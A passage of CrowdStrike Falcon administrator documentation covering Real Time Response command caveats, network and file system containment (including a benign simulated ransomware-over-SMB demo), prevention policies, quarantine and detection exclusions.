Alternatively, you can download the file within 7 days from Audit logs > Audit logs > RTR. After that time, uploaded files are deleted from the cloud; to download them again, you must run get from another Real Time Response session.

kill

You can't kill processes that are used to run the Falcon sensor.

map

Always enclose the password argument in double-quotes.
The password argument is not currently obfuscated - We recommend that you create a temporary account on the network share to limit the host’s access through Real Time Response. The cleartext password will be visible in the:
- Real time response history command
- Up-arrow recall of the command line interface
We recommend you run the unmap command immediately after completing your work on the mapped network share.
Only Falcon console users with the RTR Active Responder or RTR Administrator role can access a real time response-mapped network share using the console. Users on the host are not able to access the real time response-mapped network share.
Use the mount command to verify that the network share was successfully mapped.
Username format:
- For domain-joined accounts, the username can be in either of the following formats:
  - explicit - “Domain\Username”
  - implicit - “Username”
- For local accounts, the username must be in the format: “LocalHostName\Username”

memdump

When the memdump file destination is an external storage device (such as a USB drive) and the memory dump is larger than 4GB, the external storage must be formatted in either exFAT or NTFS. FAT32 does not support files larger than 4GB.

mv

If you try to mv a file you don't have access to, you'll see an error message like:

Access to the path 'C:\myfile.txt' is denied.

netstat

Linux hosts must have netstat installed to run the netstat command using Real Time Response.

put

Note: When using put, we recommend creating a new destination directory for the files and setting permissions so that non-admin users can't modify files there. Otherwise, attackers with a user account could modify the files you sent.

The put command works with the existing list of PUT files uploaded to Host setup and management > Response and containment > Response scripts and files. For more info, see Managing files for the put command.

The default working directory for macOS is /. Starting with macOS 10.15 Catalina, / is read-only. Therefore, put will fail if the current working directory is /. To mitigate this, run the cd command to a writeable directory before executing put.

put only supports putting files into the current working directory. For more info, see Managing files for the put command.

put-and-run

The put-and-run command reduces the potential for user error in file selection by ensuring that the file ‘put’ on the host is the same file that is ‘run’ on the host.

reg

Additional info on reg query

Run reg query with no parameters to see the list of available hives.

For user-specific registry hives, currently loaded user profiles can be found in HKEY_USERS\. Only SIDs are listed, so run the getsidcommand to map SIDs to usernames.

reg query does not return the PowerShell defaults HKCU or HKLM. HKCU, an alias for HKEY_CURRENT_USER, cannot be used because the current user for real time response is System. HKLM can be used as an alias for convenience.

Additional info on reg set

To create a subkey without creating a value, specify only the first parameter, <Subkey>.

For example, to create only the key:

C:\> reg set HKLM\SOFTWARE\TestKey
Created subkey 'HKLM\SOFTWARE\TestKey'

To create the key with a value:

C:\> reg set HKLM\SOFTWARE\TestKey TestValue -ValueType=REG_SZ -Value=MyStringValue
Created (HKLM\SOFTWARE\TestKey.TestValue) with value 'MyStringValue'

Additional info on reg load and reg unload

Important: Incorrect use of Windows registry commands can cause data loss or unexpected behavior. You should have a strong understanding of the Windows registry before modifying the registry.

For example, modify the registry while a user is logged on:

Run getsid to identify the SID belonging to the user.
Run reg query HKEY_USERS\<SID> to ensure the hive is loaded.
Run reg query, reg set, or reg delete to modify the registry as desired.

Modify the registry while a given user is not logged on:

Run reg load to load the registry hive of a user not currently logged into the host.

Run ls c:\Users to identify the registry file belonging to the target user. The final registry file path is c:\users\<username>\NTUSER.DAT.
Run a command like reg load c:\users\<username>\NTUSER.DAT HKEY_LOCAL_MACHINE\tempkey to load the user hive into a subkey under HKEY_USERS or HKEY_LOCAL_MACHINE.
Run reg query, reg set, or reg delete to modify the registry as desired. For example:

reg delete HKEY_LOCAL_MACHINE\tempkey\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MaliciousAutorunKey
Run reg unload HKEY_LOCAL_MACHINE\tempkey to close the key. You must close the key to prevent unexpected behavior the next time the user logs in.

rm

rm permanently deletes files from the host. Consider running get first if you need a copy of the file for forensic or archival use.
You can't rm actively running executables or protected system files, such as anything under C:\windows\system32.

Attempts to do so produce this error: Access to the path is denied
You can't rm files that are used to run the Falcon sensor.

run

Note: When using run, we recommend checking that the file or directory can't be modified by non-admin users. Otherwise, attackers with a user account could replace or modify the files you intend to run.

The full file path for the executable is required.
The output for executables writing to standard output aren't visible in Real Time Response sessions on Windows hosts.
Executables run in the security context of the “LOCAL SYSTEM” account on Windows and as “root” on macOS and Linux. Note that this context is very powerful and highly privileged. Take this into consideration when running programs using the run command.

unmap

Use the mount command to verify that the network share was successfully unmapped.

update

The update command relies on PowerShell and the Windows Update service.

If you need to troubleshoot update actions, find info in your host’s Windows event logs. In Event Viewer, review these logs:

Troubleshooting a host that can’t locate Windows Update patches, such as when using update list or update install:

Applications and Services Logs > Microsoft > Windows > WindowsUpdateClient
Troubleshooting a failed installation:

Applications and Services Logs > Windows PowerShell

When reviewing Windows Update logs, refer to Microsoft’s Windows Update documentation for more info about success and error codes:

xmemdump

When xmemdump is executed, it might take a long time to finish running (depending on RAM size). Click Cancel to enable the console to accept new commands, but the memory dump process will continue to run in the background and any subsequent error messaging related to the memory dump won’t appear on screen.
If you specify a file path before executing xmemdump, make sure it is not already in use. If the destination file already exists, xmemdump will return an error rather than overwriting the existing file.
Make sure there is sufficient free disk space using the mount command before executing xmemdump. The command terminates and returns an error if there is insufficient free disk space on the destination file system.
If xmemdump is called while a previous xmemdump command is still running, the newer xmemdump command will return an error message and not run.
There are two xmemdump output formats:
- Complete: Raw memory dump format that can be consumed by third-party memory forensics tools like Volatility.
- KernelDbg: Crash dump format that can be loaded into any Microsoft debug tool like WinDbg. Limitations:
KernelDbg is not supported on:
- Windows 7
- Windows 8
- Windows Server 2008R2
- Windows Server 2012
KernelDbg cannot directly write the memdump to mapped network shares.
To use Complete on Windows 10 hosts with a Microsoft hypervisor solution (Memory Integrity/Hypervisor protected Code Integrity), the hosts must use Falcon sensor version 5.29 or later.
Complete is not supported on Windows ARM64-based hosts where Hyper-V, Virtualization Based Security (VBS), or Hypervisor-Protected Code Integrity (HVCI) is enabled.

zip

If you try to zip a file you don't have access to, you'll see an error message like:

Access to the path 'C:\myfile.txt' is denied.

Network Containment

Contain compromised hosts and isolate them from network activity.

If a host has been compromised, you can network contain the host to isolate it from all network activity.

Note: Network containment is not available for ChromeOS hosts.

Requirements

Subscriptions:
- Windows, Mac, Linux: Falcon Insight XDR or Falcon Prevent + Control & Respond
- Android, iOS: Falcon for Mobile
Roles: Falcon Administrator, Falcon Security Lead
Sensor: All versions of Falcon sensor for Windows, macOS, and Linux are supported. Linux sensor version 7.06 or later is required for the sensor running in User Mode.

Network containment considerations

Falcon Container does not support network containment for pods.
The network connections that can be blocked on Android and iOS hosts depend on how the hosts are deployed and configured. For more info, see Network protection.
You can automatically network contain Android and iOS hosts if the sensor detects a man-in-the-middle attack. For more info, see Automatic network containment.

Containing a host

To change a host's network containment status, click the network containment option in the host’s summary panel. You can also contain Windows, Mac, and Linux hosts from the detection summary panel.

Network Contain: Contain a host.
Lift Containment: Restore previous connectivity to a contained host.
Lift Containment Pending: The status is in the process of moving from contained to not contained.
Containment Pending: The status is in the process of moving from not contained to contained.

Configuring your containment policy

On the Containment policy page, you can allow IP addresses, fully qualified domain names (FQDNs), or domain name system (DNS) servers with which your hosts will always be allowed to communicate, even if a host is contained.

Note: If an Android or iOS host is automatically contained due to a man-in-the-middle attack, the sensor doesn't allow these connections. For more info, see Automatic network containment.

Go to Host setup and management > Response and containment > Containment policy and click Create allowlist.
In Rule type, select one of the following options:
- IP Range: Enter the IP range that you want to allow to communicate with contained hosts.
- DNS: Enter the Domain Name System (DNS) server that you want to allow for domain resolution from contained hosts. Supported on Falcon sensor for Windows version 7.33 and later.
- FQDN: Enter the FQDN that you want contained hosts to be able to access. Optionally, select Allow subdomains if you want to allow subdomains of the FQDN to be accessed by contained hosts as well. Supported on Falcon sensor for Windows version 7.33 and later.
  Note: Selecting Allow subdomains in a policy allowlists one level of subdomains beyond the domain specified in the policy. For example, allowing subdomains for example.com will allow calendar.example.com and mail.example.com, but not my.maps.example.com.
  
  Important: If you allow subdomains, be aware that some services permit users to register arbitrary subdomains. Due to the recursive nature of DNS resolution, such subdomains resolve to IP addresses controlled by the subdomain owner. In this type of environment, allowing subdomain access could allow DNS resolution to attacker-controlled infrastructure.
Provide a name and click Add allowlist entry.

Note: If you want access to a host after it's contained, CrowdStrike advises that you work with your internal IT/networking team in a test environment to ensure that you allow everything necessary before using the host in production.

Only users with specific roles can manage containment policies. For more info, see Role Management.

Network containment FAQ

Question	Answer
Who can change the network containment status of a host?	A user must have the Falcon Administrator role or Falcon Security Lead role to contain a host or remove it from containment. However, all users can see which hosts are contained as well as host-specific containment history using the Hosts App.
What kind of hosts can be network contained?	You can contain any host running the Falcon sensor, regardless of whether the host generated a detect or not.
How does network containment affect a host's connectivity to the CrowdStrike cloud?	When a host is under containment, it can still send and receive information to the CrowdStrike cloud. Using the cloud, you can remediate and remove a host from active containment. A host under containment remains contained even if the connection to the cloud is severed or if the host is rebooted. Note: If an Android or iOS host is automatically contained due to a man-in-the-middle attack, the sensor is unable to connect to the CrowdStrike cloud due to the ongoing attack. Sensors reconnect to the cloud as soon as a trustworthy network connection can be established. For more info, see Automatic network containment.
How does network containment work at the sensor level?	Upon receiving the Network Containment request, the Falcon sensor blocks all incoming and outgoing network connections to and from the host other than the sensor's connection to the cloud. All existing connections will be terminated, except those that you have allowed using network traffic allowlisting. If the Falcon sensor receives a request to remove a host from containment, the sensor lifts all network restrictions that it previously enforced. Hosts can only be contained and removed from containment one at a time. After containing a host or removing a host from containment, the host's status will change to Pending containment or Lift Containment Pending. Note that if you want access to a host after it's contained, CrowdStrike advises that you work with your internal IT/networking team in a test environment to ensure that you allowed everything necessary before using the machine in production. Note: If an Android or iOS host is automatically contained due to a man-in-the-middle attack, the sensor doesn't allow these connections. For more info, see Automatic network containment.
What should I consider before using FQDN allowlisting in a network containment policy?	The effectiveness of FQDN allow-listing in network containment depends on the following factors: DNS lookup visibility: Cannot properly function with encrypted DNS protocols (DoH, DoT, DoQ, DoH3) as it depends on clear-text DNS traffic visibility. DNS server trustworthiness: Relies on DNS resolution integrity, which can be compromised by DNS poisoning in non-DNSSEC environments. TLS ClientHello visibility: Unable to distinguish between different domains served from shared IP addresses when TLS handshakes employ encrypted SNI/ECH or omit SNI entirely, limiting domain-specific controls for virtual hosting and CDN environments.
What are the risks of using FQDN allowlisting in a network containment policy?	When you allow-list subdomains, be aware that some services permit users to register arbitrary subdomains. Due to the recursive nature of DNS resolution, these subdomains will resolve to IP addresses controlled by whoever owns that specific subdomain. This could allow DNS resolution to attacker-controlled infrastructure. For example, allow-listing subdomains for azurewebsites.net or github.io permits the recursive DNS resolution process to traverse through delegation paths ultimately leading to authoritative nameservers controlled by anyone who registers a subdomain, including potential threat actors.
How does FQDN allowlisting work with virtual hosting and content delivery networks (CDNs)?	When using FQDN allowlisting with virtual hosting or CDNs (where multiple domains share the same IP address), the Falcon sensor specifically controls access to the allowed domains only, not all domains hosted on the same IP infrastructure. This ensures that when you allowlist a specific domain, you're not inadvertently granting access to other domains that share the same server or CDN, maintaining containment security even in these complex hosting environments.
What if I'm using a proxy?	The Falcon sensor caches information about what proxy it can connect to. As long as nothing in your network environment or proxy configuration changes, a host that is behind a proxy can be contained and removed from containment. However, if for some reason the network environment or proxy endpoint changes while a host is contained, there is a risk that the host will not be able to discover a new proxy and communicate with the cloud, and will therefore be unable to be removed from containment.
I contained a host but it still has network connectivity. What do I do?	First, check if the status of the host is Containment pending. This status means that the request is still pending. If the status persists, reissue the containment request and wait several minutes. If the status persists after reissuing the request, visit the CrowdStrike Customer Center. For US-GOV-1 and US-GOV-2 customers, visit the CrowdStrike Government Customer Center for additional assistance.
I removed a host from network containment but it is still contained. What do I do?	First, check if the status of the host is Lift Containment Pending. This status means that the request is still pending. If the status persists, reissue the lift containment request and wait several minutes. If the status persists after reissuing the request, visit the CrowdStrike Customer Center. For US-GOV-1 and US-GOV-2 customers, visit the CrowdStrike Government Customer Center for additional assistance.
Does network containment work when the sensor is in Reduced Functionality Mode (RFM)?	Network containment is not supported when the Falcon sensor for Linux is in RFM. Network containment is supported on Windows and macOS hosts running the Falcon sensor in RFM.

File System Containment

Get enhanced protection against adversaries conducting malicious remote file system activity with file system containment.

Overview

Get enhanced protection against adversaries conducting malicious remote file system activity with file system containment. File system containment helps defend against adversaries leveraging compromised credentials, such as ransomware attacks over the Server Message Block (SMB) protocol. When this feature is enabled in prevention policy settings, the Falcon sensor detects the activity and contains the compromised user on the targeted host, preventing the attack.

Requirements

Subscription: Falcon Prevent
Sensor: Falcon sensor for Windows version 7.21 or later
Roles:
- Falcon Administrator
  - Manage the File system containment prevention policy setting
  - Lift file system containment on a host
- Security Lead
  - Lift file system containment on a host
CrowdStrike clouds: Available in all clouds

Understanding file system containment

When you enable file system containment, the following actions take place:

When detecting malicious remote file system activity on the host, the sensor contains the identified remote user account on the host, preventing any destructive file system activity by the compromised user.
The user remains contained from destructive remote file system actions until file system containment is lifted.

When you lift file system containment, the following actions take place:

The containment lifts for all users on the host.
Previously contained users are allowed to perform remote file system actions.

For more info about demoing file system containment in your environment, see Demonstrate File System Containment With a Simulated Ransomware Attack.

Setup

Ensure the File System Containment prevention policy is enabled.

Go to Endpoint security > Configure > Prevention policies .
Select the prevention policy you want to edit.
Go to Malware Protection.
Select File System Containment.

Managing file system containment

Lift file system containment from endpoint detections

Go to Endpoint security > Monitor > Endpoint detections .
Select the detection for the contained host.
From the Actions menu, select Lift file system containment.

Lift file system containment from host management

Go to Host setup and management > Manage endpoints > Host management .
Select the contained host.
From the Open menu select Lift file system containment.

Lift file system containment for all hosts

To lift file system containment for all hosts at once, disable the File System Containment prevention policy setting. Disabling this policy setting lifts file system containment for all hosts that are using that policy.

Note: When you disable the prevention policy setting, the change might take up to 1 hour to apply to all hosts.

Go to Endpoint security > Configure > Prevention policies .
Click the name of the prevention policy.
Click Disable policy.

Alternatively, you can lift file system containment for all hosts using CrowdStrike APIs. For more info, see Host and Host Group Management APIs.

Demonstrate File System Containment With a Simulated Ransomware Attack

Simulate a unique non-malicious ransomware attack to demonstrate how file system containment helps defend against adversaries.

Overview

Demonstrate file system containment by simulating a unique non-malicious ransomware attack between two hosts. File system containment helps defend against adversaries leveraging compromised credentials, such as ransomware attacks over the Server Message Block (SMB) protocol. When File system containment is enabled in prevention policy settings, the Falcon sensor detects the activity and contains the compromised user on the targeted host, preventing the attack.

For more info about what file system containment is and how it works, see File System Containment.

Requirements

Subscription: Falcon Prevent
Sensor: Falcon sensor for Windows version 7.21 and later
System Requirements: Windows 10 version 1809 and later, Windows Server 2016 and later
Default roles:
- Falcon Administrator
  - Manage the File system containment prevention policy setting
  - Lift file system containment on a host
- Security Lead
  - Lift file system containment on a host
CrowdStrike clouds: Available in all clouds
Other:
- A remote host running an operating system that supports Server Message Block (SMB)-based file sharing, SMB version 2 or later
- A network environment that supports Server Message Block (SMB)-based file sharing, SMB version 2 or later

Understanding file system containment

File system containment helps prevent malicious file system level activity on a Windows host. For example, it can provide an additional layer of protection against adversaries that execute ransomware attacks over the Server Message Block (SMB) protocol from a remote host using a compromised user account.

What does file system containment do?

When file system containment is enabled and the sensor detects potentially malicious file system activity initiated by a user, the identified user is prevented from performing any further suspicious file system operations on the host. The user remains unable to perform these operations until file system containment is lifted from Endpoint detections or Host Management in the Falcon console.

Example use case: Ransomware over SMB

File system containment is used for high-fidelity detections that target ransomware attacks over the Server Message Block (SMB) protocol from a remote host.

The sensor detects ransomware file system activity initiated by a remote user over the SMB protocol from a remote host, whether managed or unmanaged.
The identified user account is prevented from performing any further delete, modify, or write file system operations on the local host.
The user remains unable to perform these operations until file system containment is lifted from Endpoint detections or Host Management in the Falcon console.

Setup

Important: Requires complete setup. You must complete all setup steps, including configuring the policy in the Falcon console and preparing test victim and attacker hosts.

Configure file system containment in the Falcon console and prepare 2 hosts to simulate a non-malicious ransomware over SMB attack.

Step 1: Enable file system containment in the Falcon console

Go to Endpoint security > Configure > Prevention policies .
Click Create policy to create a new Windows policy for this test, or edit an existing policy you use for testing or demo activities.
From the prevention policy Settings, go to the Execution blocking section and select File system containment.
Click Save.
Add the prevention policy you just created or edited to a host group that contains your test devices. For more info about enabling settings and assigning hosts to prevention policies, see Detection and Prevention Policies.
Note: You can use a new host group or an existing host group that you use for testing or demo activities.
Optional. Reboot the test endpoints to ensure they get the updated policy settings. If you don't reboot, wait up to 30 minutes for the settings to apply.

Step 2: Prepare a host to simulate a victim

The host has important data stored on an SMB share. Other users with valid account credentials on the same network have access to the data.

Ensure that the host is running Windows 10 version 1809 or later.
Install the Falcon sensor for Windows, version 7.21 or later, if it is not already installed.
Create a test user account, for example, VictimUser1, with a password and network login permissions, if one does not already exist.
Create a test share folder, for example, c:\TestShare, if one does not already exist.
Grant the local test user account, for example, VictimUser1, read, write, and execute permissions to the test share folder.
Optional. To simulate a more realistic scenario, place additional test files in the test share folder.

Step 3: Prepare a host to simulate an attacker

The host simulates an attacker that has access to an unmanaged host on your network with a stolen set of user credentials.

Ensure that the attacker host is running Windows 10 version 1809 or later.
Ensure that the Falcon sensor for Windows is not installed.
From File Explorer, map a network drive to the share folder created in the previous section, for example, \\VictimHost\TestShare. For more info, see Microsoft’s documentation about mapping a network drive.
Use the same test user account, for example, VictimUser1, credentials you created for the victim host in the previous section.

Step 4: Perform a simulated attack

Simulate a ransomware over SMB attack using the attacker host and test user account you configured in previous steps. When the Falcon sensor enacts file system containment on the victim host, applicable events and a detection appear in the Falcon console.

Write a file, with no file extension, named crowdstrike_ransomware_over_smbtest_text_trigger to the share.
In the Falcon console, go to Endpoint security > Monitor > Endpoint detections .
Ensure that a detection appears, with the File system containment status of Contained, as expected.
Select the detection.
From the detection details, see the Host section for info about the remote host, such as IP address and login domain.
Go to Host setup and management > Manage endpoints > Host management .
For the victim host, ensure that File system containment status is Contained.
From the attacker host, verify that you can read files, but can no longer write, execute, or delete files from the share. For example, if you try to delete a file, a File Access Denied or Destination Folder Access Denied error message appears.

Step 5: Lift file system containment

In the Falcon console, go to Host setup and management > Manage endpoints > Host management .
Select the victim host to view Host information.
From the Actions menu, select Lift file system containment.
After a few minutes, use the the test account, for example, VicitimUser1, on the attacker host. Verify that you can now write, execute, and delete files to the SMB share on the victim host.

Next steps

After successfully preventing the simulated ransomware over SMB attack, configure file system containment for additional prevention policies. In configuring file system containment, you protect the hosts with the applied policy from similar attacks. For more info, see Setup.

Searching for file system containment events

Using file system containment creates new FileSystemContainmentStatus and FileSystemUncontainmentRequestAll events. For more info about these events, see Events Full Reference (Events Data Dictionary)

To review these events in your environment, execute the following search query from Advanced event search: #event_simpleName = /FileSystemContainment/i OR #event_simpleName = /FileSystemUncontainment/i

Configuration

Detection and Prevention Policies

Create and manage the prevention policies, exclusions, and custom IOCs and IOAs that control what activity is blocked, killed, quarantined, and allowed on your hosts.

Prevention policies

Assign prevention policies to manage the activity that triggers detections and preventions on your hosts, which you can monitor on the Activity dashboard. Policies are platform specific. When you assign a policy to a host group, the policy settings apply to hosts in the group on the corresponding platform. For more info about host groups, see Managing host groups.

For more info about prevention policy settings and recommendations, see Prevention Policy Settings. For more info about how policies work, see Policies in Falcon.

Create a prevention policy

Tip: As an alternative to creating a policy from scratch, you can duplicate an existing policy and then modify its settings as needed. For more info, see Duplicate a prevention policy.

Go to Endpoint security > Configure > Prevention policies .
Click Create policy.
Enter a policy name and select a platform.
Optional. Enter a description.
Click Create policy.
On the Settings tab, enable or disable individual prevention settings.
Tip: Click the name of a setting to open the corresponding details panel showing descriptions and recommendations.
In the Cloud machine learning and Sensor machine learning sections, select a protection level for each setting you want to enable.
To save your prevention policy settings, click Save, then click Confirm.
To enable the policy, click Enable policy.

Assign host groups to a prevention policy

Go to Endpoint security > Configure > Prevention policies .
Click Platform and select a policy platform.
Click the name of the policy you want to assign host groups to.
Click the Assigned host groups tab.
Click Assign host groups.
Select the host groups you want to assign.
Click Assign groups.

Assign custom IOAs to a prevention policy

Assign custom indicators of attack (IOA) rules to a policy to protect host groups from undesirable behaviors specific to your organization. For more info, see Custom IOA rules.

Go to Endpoint security > Configure > Prevention policies .
Click Platform and select a policy platform.
Click the name of the policy you want to assign custom IOAs to.
Click the Assigned custom IOAs tab.
Click Assign rule group.
Select the rule groups you want to assign.
Click Assign groups.

Edit a prevention policy

To edit an existing policy:

Go to Endpoint security > Configure > Prevention policies .
Click Platform and select a policy platform.
Click the name of the policy that you want to edit.
Edit the policy settings as needed.
Click Save.
Click Save to confirm the changes to the policy.

Duplicate a prevention policy

As an alternative method for creating a detection and prevention policy, you can duplicate an existing policy and then modify the settings as needed.

Duplicate policies inherit the settings of the original policy. By default, duplicated policies are disabled.

A policy and its duplicate are independent of each other. Changes to either policy are not reflected in the other.

Go to Endpoint security > Configure > Prevention policies .
Click Platform and select a policy platform.
Click the name of the policy you want to duplicate.
Click Duplicate policy.
Edit the policy name and optional description.
To assign the same host groups assigned to the original policy, select Duplicate assigned host groups.
To assign the same custom IOA rule groups assigned to the original policy, select Duplicate assigned custom IOA rule groups.
Click Duplicate.

You can now modify the new policy settings, assign host groups, and enable the policy as needed.

Disable a prevention policy

You can temporarily suspend a policy by disabling it. When you disable a policy, the policy is disabled for online hosts. For offline hosts, the policy is disabled when the hosts come back online.

Note: When you disable a policy, assigned hosts are reassigned another policy based on policy precedence. For more info, see Policy precedence.

Go to Endpoint security > Configure > Prevention policies .
Click Platform and select a policy platform.
Click the name of the policy you want to disable.
Click Disable policy.
Click Disable policy to confirm the action.

Delete a prevention policy

You can permanently remove a policy by deleting it. You must disable the policy before you can delete it.

Note: When you delete a policy, assigned hosts are reassigned another policy based on policy precedence. For more info, see Policy precedence.

Go to Endpoint security > Configure > Prevention policies .
Click Platform and select a policy platform.
Click the name of the policy you want to delete.
On the Settings tab, click Delete.
Click Delete Policy.

Policy precedence

Hosts can belong to multiple host groups. Host groups can be assigned to multiple policies. Policy precedence determines which policy applies. Each policy is assigned a precendence value where 1 is the highest. When a host has multiple assigned policies, the policy with the higher precedence applies.

If something changes with that highest-ranking policy, for example if the policy is disabled, then the next highest-ranking policy applies.

Note: For each platform, there is a default policy that applies to all hosts that don't have an assigned policy. Configure default policies with the most conservative settings you’re comfortable applying.

With dynamic host groups, a host with a newly-installed sensor inherits the relevant host group assignments and applies the policy with highest precedence. If changes to a host affect dynamic host group assignment, policy assignment might also be affected. For example, an OS upgrade or an OU reassignment might move a host to a host group with a different policy.

Change policy precedence

Go to Endpoint security > Configure > Prevention policies .
Click Edit precedence.
For a policy in the table, click and drag the corresponding arrow to change its precedence.
Click Save.

Verify the active policy

To ensure that the proper settings are applied to your hosts, check a group or host to verify the active policy.

Show a group’s policy precedence by going to Host setup and management > Manage endpoints > Host groups and selecting the group’s row.

$Screenshot of the policy precedence of a group on the Groups page$

Alternatively, you can view a host’s applied policies by searching for it in Host setup and management > Manage endpoints > Host management . The active policies are listed in the columns to the right.

Screenshot of applied policies on the Host Management page

Below is a diagram outlining how policy precedence works along with the impact to assigned hosts and pending hosts:

Diagram showing how policy precedence is evaluated on a host

Quarantined files

The Falcon sensor can quarantine suspicious files based on your prevention policies. When the Falcon sensor detects a suspicious file attempting to run, the file is encoded, renamed, and moved into a quarantine directory on its host.

To use quarantining, you first enable it using a prevention policy. You can review and take action on quarantined files when monitoring detections.

Note: Files quarantined can include executable files, dynamic-link libraries (DLLs) and other non-process executable file types written by a process, such as config text files. If you have files that you don't want to be quarantined and sent to the CrowdStrike cloud, set up an exclusion. For more info, see Exclusions.

About quarantine

File location: Quarantined files are placed in a compressed file on the host in the quarantine directory:
- Windows hosts: \Windows\System32\Drivers\CrowdStrike\Quarantine
- Mac hosts: /Library/Application Support/CrowdStrike/Falcon/Quarantine
- Linux hosts: /opt/CrowdStrike/Quarantine
File retention:
- Quarantined files are deleted from the host after 30 days. You can release files to prevent them from being deleted. For more info, see About Endpoint Monitoring.
- Quarantined files are deleted from the CrowdStrike cloud after 90 days.
Network containment: If your network contains a host, it continues to quarantine files normally.
Prevention policies: If you disable the quarantining prevention policy on a host, no further files will be quarantined on that host. Any files that were previously quarantined remain quarantined.
Uninstallation: If you uninstall the sensor, the quarantined files are deleted during uninstallation.
Do not use quarantining on a host that uses other antivirus software. Unexpected behavior can result if multiple pieces of software attempt to quarantine the same file.
Quarantining does not apply to the following:
- Exploit mitigation
- Ransomware
- Exploitation Behavior
- Lateral Movement and Credential Access

Enable quarantine

Note: On Windows Server 2016, Server 2019, and Server 2022, Windows Defender is enabled by default. Because Windows Server operating systems do not have Windows Security Center, the sensor can't register with it like Windows 10 and disable Windows Defender automatically. To use quarantine on these operating systems, you must disable Defender. For more info, see Services.

Enable or configure quarantining on hosts using prevention policies.

Find the host's prevention policy in Endpoint security > Configure > Prevention policies .
Find the entry with a type of Next-Gen Antivirus and a category of Quarantine. Click Enable All.

Note: When this setting is enabled, we recommend setting anti-malware prevention levels to Moderate and not using other antivirus solutions. For hosts that run Windows, CrowdStrike Falcon registers with Windows Security Center, disabling Windows Defender.

Custom settings and configurations

Exclusions

Overview

If the Falcon console is showing detections that you don’t want to see, or is preventing activity that you want to allow, you can create exclusions to prevent detections from being generated, or to allow trusted processes to run.

For info about excluding detections generated from integrated third-party data, see Third-Party Detection Exclusions.
For info about configuring mobile detection exclusions, see Excluding mobile detections.
For info about configuring Falcon Data Protection detection exclusions, see About detections.

Requirements

Subscriptions: Falcon Insight XDR or Falcon Prevent

Sensor support:

Machine learning (file path) exclusions: All supported versions of Falcon sensor for macOS, Windows, and Linux
Note: Falcon Container does not support exclusions for pods.
Machine learning (certificate) exclusions: Falcon sensor for Windows version 7.20 and later
IOA exclusions: All supported versions of Falcon sensor for macOS, Windows, and Linux
Sensor visibility exclusions: All supported versions of Falcon sensor for macOS, Windows, and Linux

Note: Support for parent or grandparent process context in Machine learning (file path) exclusions and IOA exclusions is only available in Falcon sensors for Mac, Windows, and Linux version 7.33 and later. Attempting to apply parent or grandparent fields to unsupported sensors will have no effect on your exclusions.

Roles:

These roles can create and manage exclusions:
- Falcon Administrator
- Detections Exceptions Manager
These roles can view exclusions, exclusion audit logs, and IOA exclusion activity logs:
- Falcon Endpoint Manager
- Falcon Analyst
- Falcon Analyst - Read Only
- Falcon Security Lead
- Falcon Investigator
- Custom IOAs Manager
- Desktop Support Analyst
- Device Control Manager
- Endpoint Manager
- EPP Detection Admin
- EPP Analyst
- Falcon Admin
- Falcon Analyst
- Falcon Investigator
- Falcon Analyst - Read Only
- Flight Control Managed Analyst
- Firewall Manager
- Help Desk Analyst
- CSPM Admin
- CSPM Analyst
- CSPM Read Only Analyst
- Identity Protection Administrator
- Identity Protection Domain Administrator
- Identity Protection Policy Manager
- Falcon Container Image Admin
- Mobile Admin
- Prevention Policy Manager
- Quarantine Manager
- Remediation Manager
- Real Time Responder - Active Responder
- Real Time Responder - Read Only Analyst
- Real Time Responder - Administrator
- Workflow Author
- Falcon Security Lead

Before you begin

Exclusions are applied to hosts based on their group membership. Set up host groups before you create an exclusion. For more info, see Manage Host Groups.

Exclusions let you create a specific allowlist, but they aren’t the only way to adjust the detections you see. Review your prevention policy settings to see if any policies are set to a level that's more aggressive than recommended by our best practices. These policies might trigger certain detections about activity that you don’t need to see. For more info, see Prevention Policy Settings.

Understand exclusions

Occasionally, Falcon might detect or prevent activity that you expect and allow in your environment. By creating exclusions, you can stop seeing detections that you don’t want to see, and allow processes that would otherwise be prevented. The exclusions that you create effectively form an allowlist that explicitly defines your organization’s known trusted activity.

You can create these types of exclusions:

Exclusion type	Description	Supports parent or grandparent process context?	Events logged?
Machine learning (file path) exclusion	For trusted file paths, stop all ML-based detections and preventions, or stop files from being uploaded to the CrowdStrike cloud.	Yes	Yes
Machine learning (certificate) exclusion	For files signed by a specific certificate that is trusted on the target endpoint, stop all ML-based detections and preventions, or stop files from being uploaded.	No	Yes
Indicator of attack (IOA) exclusion	Stop all behavioral detections and preventions for an IOA that’s based on a CrowdStrike-generated detection, including runtime container drift.	Yes	Yes
Sensor visibility exclusion	For trusted file paths that you want to exclude from sensor monitoring, minimize sensor event collection, and stop all associated detections and preventions. Use sensor visibility exclusions with extreme caution. Potential attacks and malware associated with excluded files will not be recorded, detected, or prevented.	No	Most events are not logged

Machine learning exclusions

Reduce false-positive detections by creating machine learning exclusions. Define file path patterns or select a certificate to exclude files from detections or preventions derived from machine learning techniques. You can use these exclusions to stop static file-based detections and preventions through machine learning techniques or custom hash blocklists. You can also stop file uploads to the CrowdStrike cloud.

Note: Machine learning (certificate) exclusions do not apply to files located on Compact Disc File System (CDFS) or network file shares.

Considerations for machine learning exclusions

A machine learning exclusion has three configurable parts:

Exclusion definition:
- For file path exclusions: An exclusion pattern that defines a file path, name, or extension. Exclusion patterns are written in glob syntax. For more info, see Glob Syntax.
  - Optional. You can also define an exclusion pattern with a parent or grandparent process to match. This allows you to define more granular exclusions, which reduces the potential attack surface.
    
    Important: On-demand scans and some cloud detections do not use parent and grandparent exclusion definitions.
- For certificate exclusions: A trusted certificate that is used to digitally sign a file.
An exclusion type that defines the type of activity that you want to exclude. Choose one or both exclusion types:
- Detect/Prevent
- For file path exclusions only: Upload Files to CrowdStrike
  
  Note: CrowdStrike ignores parent and grandparent exclusion fields for file uploads.
A set of hosts that the exclusion applies to. Choose all hosts or select specific host groups.

Detect/Prevent

Any file matching the exclusion pattern or signed by an excluded certificate won’t be detected or blocked by the Falcon sensor. The activity is logged through events sent to the CrowdStrike cloud, but a detection is not generated.

The most common reason to create a Detect/Prevent exclusion is to minimize false-positive detections for trusted applications. For example, your organization might use an internal tool that's blocked by the Falcon sensor. You can create an exclusion to permit that tool to run without triggering a Detect or Prevent action.

Create Detect/Prevent exclusions to target very specific situations. If your exclusion is too broad, you might inadvertently permit malicious activity that should be detected or blocked.

As an additional option, you can also choose to define a matching parent or grandparent process lineage that will trigger the file path exclusion. For example, instead of only excluding MyApp.exe, you can also define the parent process that can execute MyApp.exe, such as ITTool.exe. In this example, the system will only allow MyApp.exe to execute if ITTool.exe directly runs it.

Upload files to CrowdStrike

